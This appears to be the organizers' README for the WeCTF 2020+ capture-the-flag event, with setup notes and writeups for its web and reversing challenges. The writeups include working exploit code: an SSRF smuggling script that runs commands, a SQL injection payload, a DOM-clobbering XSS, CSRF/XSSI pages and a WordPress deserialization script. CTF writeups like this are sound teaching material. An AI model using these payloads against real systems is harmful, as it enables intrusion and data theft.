WeCTF 2020+ Source Code & Organizer's Writeup

Overview

WeCTF 2020+

Thank you all for participating! This README contains our writeup sketches. You can also share your writeup on CTFtime.

Event Link: https://ctftime.org/event/1072

Run Challenges Locally

git clone https://github.com/wectf/2020p
cd 2020p && docker-compose up

The mapping is as following

localhost:8000 -> babyrev
172.129.1.100 -> KVCloud 
localhost:8003 -> dont-bf-me
localhost:8004 -> Hashtable
localhost:8005 -> Notebin 
localhost:8006 -> Wallet

babyrev

38 solves

Description

Shou only allows his gay friends to view the flag here. We got intels that he used PHP extension for access control and we retrieved a weird binary.

Handout: https://github.com/wectf/2020p/blob/master/babyrev/babyrev.so

Author: @qisu

Writeup

The extension compares requests' user-agent with string "Flag Viewer 2.0".

PoC:

curl -H "User-Agent: Flag Viewer 2.0" [HOST]

Red Team

61 solves

Description

We overheard that Shou's company hoarded a shiny flag at a super secret subdomain.

His company's domain: shoustinycompany.cf (Challenge is down now)

Note: You are allowed to use subdomain scanner in this challenge.

Writeup

Step 1: Do a subdomain scan and you would discover docs.shoustinycompany.cf

Step 2: You find a few files at that subdomain indicating we need to perform an AXFR attack at 161.35.126.226.

logs.txt

[12/19] Eddie started the process following RFC 5936.
[12/18] Shou approved NS records transfering.
[12/17] Eddie proposed to transfer NS records to our looking glass server (161.35.126.226:53). 
[12/16] Shou appointed Eddie to be network admin.

info.txt

### Company's websites
Looking Glass: lookingglassv1.shoustinycompany.cf
Flag: [Removed by Shou]

Step 3: You find another subdomain lookingglassv1.shoustinycompany.cf with IP 161.35.126.226.

Step 4: Perform AXFR transaction at lookingglassv1.shoustinycompany.cf by

dig AXFR shoustinycompany.cf @ns1.shoustinycompany.cf

KVCloud

13 solves

Description

Shou hates to use Redis by TCPing it. He instead built a HTTP wrapper for saving his key-value pairs.

Flag is at /flag.txt.

Hint: How to keep-alive a connection?

Note 1: Remote is not using 127.0.0.1 as Redis host.

Note 2: Try different host if your payload is not working remotely.

Handout: https://github.com/wectf/2020p/blob/master/kvcloud/handout.zip

Writeup

SSRF with Connection: keep-alive:

from requests import *
import urllib
port = 5000
cmd = b"import os; os.system('whoami')"
content_len = str(4 + len(cmd)).encode('ascii')
payload = urllib.parse.quote(b"/x\r\nConnection: keep-alive\r\n" +
	b"Pragma: no-cache\r\n\r\nPOST /debug HTTP/1.1\r\n" + 
	b"Host: 127.0.0.1:5000\r\nUser-Agent: curl/7.68.0\r\n"+ 
	b"Accept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %s\r\n\r\ncmd=%s" % (
		content_len, cmd), safe='')
c = get("http://[HOST]:%s/get?redis_port=%s&key=%s" % (port, port, payload)).content
print(c)
print("http://[HOST]:%s/get?redis_port=%s&key=%s" % (port, port, payload))

dont-bf-me

36 solves

Description

Shou uses Recaptcha for his site to make it "safer".

Hint: The password is so long that makes any bruteforcing method impotent.

Handout: https://github.com/wectf/2020p/blob/master/dont-bf-me/handout.zip

Writeup

parse_str in login.php could overwrite $RECAPTCHA_URL and $CORRECT_PASSWORD.

Hashtable

15 solves

Description

Universal hashing could prevent hackers from DoSing the hash table by creating a lot of collisions. Shou doubt that. Prove him correct by DoSing this hash table implemented with universal hashing.

Note: having 10 collisions at the same slot would give you the flag

Handout: https://github.com/wectf/2020p/blob/master/hashtable/handout.zip

Writeup

Pseudo Random Number PoC:

Save following file as main.go and run go run main.go [TIMESTAMP].

package main

import (
	"fmt"
	"math/big"
	"math/rand"
	"os"
	"strconv"
)

const TableSize = 10000

var TableSizeBI = big.NewInt(int64(TableSize))

const MaxCollision = 10

type LinkedList struct {
	Content       [MaxCollision]int
	InsertedCount int // count of element in linked list
}

type HashTable struct {
	Content      [TableSize]*LinkedList // array for mapping hash to the linked list
	HashParam1   *big.Int               // p1 for hashing
	HashParam2   *big.Int               // p2 for hashing
	ElementCount int                    // count of all elements in hash table
}

func (t *HashTable) hash(value int) uint {
	v := big.NewInt(int64(value))
	var h big.Int
	h.Exp(v, t.HashParam1, t.HashParam2)
	h.Mod(&h, TableSizeBI)
	return uint(h.Uint64())
}

func (t *HashTable) insert(value int) bool {
	var elementHash = t.hash(value)                
	var linkedListForHash = t.Content[elementHash]
	linkedListForHash.InsertedCount++
	if linkedListForHash.InsertedCount > 10 {
		fmt.Println(linkedListForHash.Content)
		return true
	}
    t.ElementCount++
    linkedListForHash.Content[linkedListForHash.InsertedCount-1] = value
	return false 
}

func main() {
	var t HashTable
    x, _ := strconv.Atoi(os.Args[1])
	rand.Seed(int64(x))
	t.HashParam1 = big.NewInt(int64(rand.Intn(1 << 32)))
    t.HashParam2 = big.NewInt(int64(rand.Intn(1 << 32)))
    for i := 0; i < TableSize; i++ {
		t.Content[i] = &LinkedList{[MaxCollision]int{}, 0}
	}
	t.recreate()
	for i := 1 << 13; i < 1<<16; i++ {
		if t.insert(i) {
			break
		}
	}
}

Hall of Fame

22 solves

Description

We made a Slack bot (@hof) to remember our past winners. Hope no one hacks it cuz we are running it on a really important database.

Handout: https://github.com/wectf/2020p/tree/master/hof

Writeup

SQL Injection

Send following content to @hof would yield the flag:

rank x') UNION SELECT 1,1,(SELECT flag from flags LIMIT 1) ---

Notebin

8 solves

Description

Here is where Shou keeps his pathetic diaries and a shinny flag.

Writeup

DOM Clobbering => XSS

Set title as following could make content bypass DOMPurify.

<a id="_debug">a><a id="_debug" name="key" href="sha1:f03e8a370aa8dc80f63a6d67401a692ae72fa530">a>

Wallet

4 solves

Description

Shou has a habit of saving secret (i.e. flag) in the blockchain. Here is where he stores his bitcoin addresses.

Note: wrap what you find on blockchain with we{.....}

Hint 1: You should leak the bitcoin address in Shou's wallet first.

Hint 2: Shou is using Firefox. Firefox does not have CORB.

Handout: https://github.com/wectf/2020p/blob/master/wallet/handout.zip

Writeup CSRF + XSSI + Some recon

0.html:

<form action="http://[HOST]/address" method="post" id="f">
    <input name="address" value='xxxx"'/>
form>
body>
<script>
    f.submit()
script>

1.html

<form action="http://[HOST]/style" method="post" id="f">
    <input name="style" value='"Raw'/>
form>
body>
<script>
    f.submit()
script>

2.html

<div id=iframe2>div>
<div id=iframe3>div>
<script id="script1">script>
<script>
    function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
    async function main(){
        ifr2 = document.createElement('iframe');
        ifr2.name='attack';
        ifr2.src = "0.html";
        iframe2.appendChild(ifr2);
        await sleep(1000);
        ifr3 = document.createElement('iframe');
        ifr3.name='attack';
        ifr3.src = "1.html";
        iframe3.appendChild(ifr3);
        await sleep(1000);
        sc = document.createElement('script');
        sc.name='attack';
        sc.src = "http://[HOST]/";
        script1.appendChild(sc);
        await sleep(1000);
        dealwithit(style); // <= bitcoin address
    }
    main();
script>

Save 0.html, 1.html, 2.html and send 2.html as payload.

After getting the bitcoin address, you can find flag in OP_RETURN of one transaction.

Wordpress

2 solves

Description

Shou made his first wordpress plugin! Check it out!

Note 1: it is unnecessary to be admin to solve this challenge and to ensure the stability, we removed almost all possible ways to be admin.

Handout: https://github.com/wectf/2020p/blob/master/wordpress/handout.zip

Writeup

Wordpress Entry Overwrite + Unsafe Deserialization

from requests import *
HOST = "http://wordpress.ctf.so/"
import re
des_content = 'a:1:{i:0;O:5:"Upage":4:{s:7:"user_id";N;s:9:"user_info";a:0:{}s:4:"conf";s:5:"/flag";s:16:"disallowed_words";a:0:{}}}'
s = Session()

s.post(f"{HOST}wp-login.php", headers={ 'Cookie':'wordpress_test_cookie=WP Cookie check' }, data={
    "log": "[WORDPRESS EMAIL]",
    "pwd": "[WORDPRESS PASSWORD]",
    "wp-submit": "Log In",
    "redirect_to": HOST,
"testcookie": "1"
})


print(s.post(f"{HOST}wp-admin/admin.php?page=edit_upage", data={
    "key": "session_tokens",
    "value": des_content
}).text)

print(s.get(f"{HOST}wp-admin").text)
Issues
  • docker-compose up error on challenge hashtable

    docker-compose up error on challenge hashtable

    I want to run challenges locally, and I got an error when executing "Run go build" challenge hashtable. I'm not familiar with go, and I don't how to solve that problem.

    Here is the log. image

    ------
     > [6/6] RUN go build:
    #10 0.528 # vendor/github.com/gin-gonic/gin/internal/json
    #10 0.528 ../vendor/github.com/gin-gonic/gin/internal/json/json.go:5:3: //go:build is not allowed in the standard library
    ------
    executor failed running [/bin/sh -c go build]: exit code: 2
    ERROR: Service 'hashtable' failed to build : Build failed
    

    Looking forward to a solution, thanks a lot!

    opened by FantasqueX 3
  • Authentication token

    Authentication token

    • One extra quote at the end of line 57 in docker-compose.yaml

    • When I try to run containers with docker-compose up, I got this error : ERROR: Head https://docker.pkg.github.com/v2/wectf/2020p/babyrev/manifests/latest: no basic auth credentials

    Then I tried to directly authenticate on "https://docker.pkg.github.com/v2/wectf/2020p/babyrev/manifests/latest:" and got this one : {"errors":[{"code":"UNAUTHORIZED","message":"Your request could not be authenticated by the GitHub Packages service. Please ensure your access token is valid and has the appropriate scopes configured."}]}

    opened by MiniExploit 1
  • Fix go build error

    Fix go build error

    I found the same problem with #2 in challenge notebin

    opened by FantasqueX 0
Owner
WeCTF Organizers
WeCTF Organizers
Visualize how a projects source code is distributed among its files and folders

Source Code Visualizer Visualize the code distribution in a project. Applications Applications include: Visualizing code distribution for more educate

Guy Levin 79 Nov 30, 2021
Code snippets by first time open source contributors

Introduction Golang code snippets by first time open source contributors Rules How to contribute Add a folder and create your desired code snippet fil

Luigi Morel 1 Oct 6, 2021
The High Code Framework (low-code for devs)

hof - the high code framework The hof tool tries to remove redundent development activities by using high level designs, code generation, and diff3 wh

_Hofstadter 178 Dec 6, 2021
An open source gitlab linting utility

gitlab-lint API and collector An open source gitlab linting utility Frontend https://github.com/globocom/gitlab-lint-react How to install Install depe

Globo.com 16 Oct 29, 2021
Neko is a cross-platform open-source animated cursor-chasing cat. This is the reimplementation write in Go.

Neko Neko is a cat that chases the mouse cursor across the screen, an app written in the late 1980s and ported for many platforms. This code is a re-i

Cesar Gimenes 8 Nov 19, 2021
An OBS overlay (browser source) for mumble

Mumble UI An attempt at creating an overlay that could be used inside of OBS to show who is speaking for the DAY[0] Podcast. It is meant to be reasona

DAY[0] 1 Nov 20, 2021
Morse Code Library in Go

morse Morse Code Library in Go Download and Use go get -u -v github.com/alwindoss/morse or dep ensure -add github.com/alwindoss/morse Sample Usage pac

Alwin Doss 70 Nov 22, 2021
XSD (XML Schema Definition) parser and Go/C/Java/Rust/TypeScript code generator

xgen Introduction xgen is a library written in pure Go providing a set of functions that allow you to parse XSD (XML schema definition) files. This li

null 121 Nov 25, 2021
Get user-like access to VirtualBox VMs from Go code.

#Vboxgo Get user-like access to VirtualBox VMs from Go code. This library wraps some define-tainted VirtualBox SDK functions, making it possible to ge

Vladislav Supalov 27 Oct 25, 2021
Jennifer is a code generator for Go

Jennifer Jennifer is a code generator for Go. package main import ( "fmt" . "github.com/dave/jennifer/jen" ) func main() { f := NewFile("m

Dave Brophy 2.2k Nov 30, 2021
Universal code search (self-hosted)

Sourcegraph OSS edition is a fast, open-source, fully-featured code search and navigation engine. Enterprise editions are available. Features Fast glo

Sourcegraph 5.4k Dec 6, 2021
Yet another Go REPL that works nicely. Featured with line editing, code completion, and more.

gore Yet another Go REPL that works nicely. Featured with line editing, code completion, and more. (Screencast taken with cho45/KeyCast) Usage gore Af

Hironao OTSUBO 4.3k Nov 24, 2021
Nodebook - Multi-Lang Web REPL + CLI Code runner

nodebook Nodebook - Multi-Language REPL with Web UI + CLI code runner Useful to practice algorithms and datastructures for coding interviews. What is

Jérôme Schneider 1.5k Nov 23, 2021
Experimental code execution microservice based on Docker containers.

ranna ランナー - Experimental code runner microservice based on Docker containers. ⚠ PLEASE READ BEFORE USE First of all, this project is currently work i

ranna 18 Oct 25, 2021
README snippets for Visual Code inspired by readme.so

vscode-readme This was inspired by @katherinepeterson who made the wonderful readme.so! Huge thanks. Configuration Make sure you have quickSuggestions

ThreeComma.io 14 May 19, 2021
Assembly syntax that makes you feel like you're writing code in a high-level language.

shasm Assembly syntax that makes you feel like you're writing code in a high-level language. Shasm is not an Assembler. Shasm simply compiles Shasm sy

Shoyaaa 14 Jun 5, 2021
Auto-evaluate your Golang code.

Ginker Ginker is a GUI application for auto-evaluating your Golang code. It allows you to write and run Golang code on the fly and it will help you to

nkoporec 8 Jun 24, 2021
Golang Code Challenge for PARSPOOYESH

golang-code-challenge Dependencies You must have go and Docker installed on your machine also you need to go get this Dependencies: name repo gorilla/

Armin Goodarzi 3 Jul 24, 2021
General Golang Code Generator

gg gg is a General Golang Code Generator: A Good Game to play with Golang. package main import ( "fmt" . "github.com/Xuanwo/gg" ) func main() {

Xuanwo 36 Nov 5, 2021